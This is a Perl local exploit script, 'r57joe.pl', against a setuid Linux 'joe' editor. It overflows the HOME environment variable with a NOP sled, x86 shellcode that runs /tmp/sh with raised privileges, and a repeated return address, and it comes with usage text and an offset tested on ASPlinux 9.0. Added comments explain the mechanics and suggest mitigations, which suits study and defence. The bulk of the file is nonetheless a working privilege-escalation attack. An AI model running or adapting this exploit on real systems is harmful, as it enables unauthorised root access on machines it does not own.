#!/usr/bin/perl
# ***
# __________ ___ ___
# \______ \__ __ ______/ | \
# | _/ | \/ ___/ _ \
# | | \ | /\___ \\ /
# |____|_ /____//____ >\___|_ /
# \/ \/ \/
# ***
# r57joe.pl
# Linux "joe" local exploit
# by 1dt.w0lf // RusH security team
# www.rsteam.ru , http://rst.void.ru
# ***
# usage: ./r57joe [offset]
# by default offset = -1000 : tested on ASPlinux 9.0

# Historical proof-of-concept against a setuid /usr/bin/joe (see the -u
# test below): the script assembles an oversized value, places it in the
# HOME environment variable and exec()s joe with that environment.  For a
# defender the two facts that matter are visible right here: the script
# refuses to proceed unless the binary carries the setuid bit, so removing
# that bit removes the precondition, and the payload is delivered through
# an environment variable of roughly $len bytes whose front is a run of
# 0x90 bytes -- an observable pattern for process-launch auditing.
# The file has no `use strict`/`use warnings`; every variable is a
# package global and the offset argument is never validated as a number.

# Total length in bytes of the value written to HOME.
$len=1056;
# Base return address for one specific distribution build (header above);
# the command-line offset is added to it before packing.
$ret = 0xbfffffb1;
$offset = -1000;
# Single NOP byte used to fill the front of the buffer.
$nop = "\x90";
# proof of concept
# Machine-code payload.  Reading the bytes, it appears to issue two
# int 0x80 calls (al=0x17, al=0x2e) and then an al=0x0b call, with the
# string "/tmp/sh" (0x2f 0x74 0x6d 0x70 0x2f 0x73 0x68) delimited by 0x01
# placeholder bytes at the end -- i.e. it expects a shell binary at /tmp/sh
# to already exist.  Confirm the exact semantics by disassembly rather
# than from this comment.
$shellcode ="\x31\xdb\x89\xd8\xb0\x17\xcd\x80" .
            "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" .
            "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" .
            "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" .
            "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" .
            "\xff\xff\x01\x2f\x74\x6d\x70\x2f\x73\x68\x01";

# Exactly one argument (the offset) is required; anything else prints
# usage and exits.
if(@ARGV != 1) {
    print "-----------------------------\n";
    print "*** r57joe.pl\n";
    print "*** linux joe local exploit\n";
    print "*** usage: ./r57joe.pl [offset]\n";
    print "*** offset -1000 : tested on ASPLinux 9.0\n";
    print "-----------------------------\n";
    exit();
}
# Always true at this point (the branch above has already exited for any
# other argument count); the argument overrides the default offset with no
# numeric validation.
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
# Precondition check: -u is the setuid file test.  Without the setuid bit
# the script stops here, which is the mitigation the check itself implies.
if( ! -u "/usr/bin/joe" ) {
    print "joe is not suid =(((\n";
    exit();
}

# Layout of the buffer: [NOP fill][shellcode][156 bytes of return address].
# The fill length is whatever remains of $len after the other two parts.
for ($i = 0; $i < ($len - length($shellcode) - 156); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
# pack('l') gives a native-endian signed 32-bit value.  chomp() operates
# on $/ (newline), not on binary structure, so it only has an effect if the
# packed value happens to end in 0x0a.
$pack_ret = pack('l', ($ret + $offset));
chomp($pack_ret);
# 156 / 4 = 39 repetitions of the 4-byte address.
for($i = 0; $i < 156; $i += 4) {
    $buffer .= $pack_ret;
}

print "-----------------------------\n";
print "*** joe local exploit by r57\n";
print "-----------------------------\n";
print "OFFSET : $offset\n";
print "-----------------------------\n";

# The buffer is delivered through the environment.  local() on %ENV never
# unwinds here because exec() replaces the process image; the child simply
# inherits the oversized HOME.  exec() is given a single literal path with
# no shell metacharacters, so no shell is involved, and its failure return
# is not checked.
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/joe");

# EOF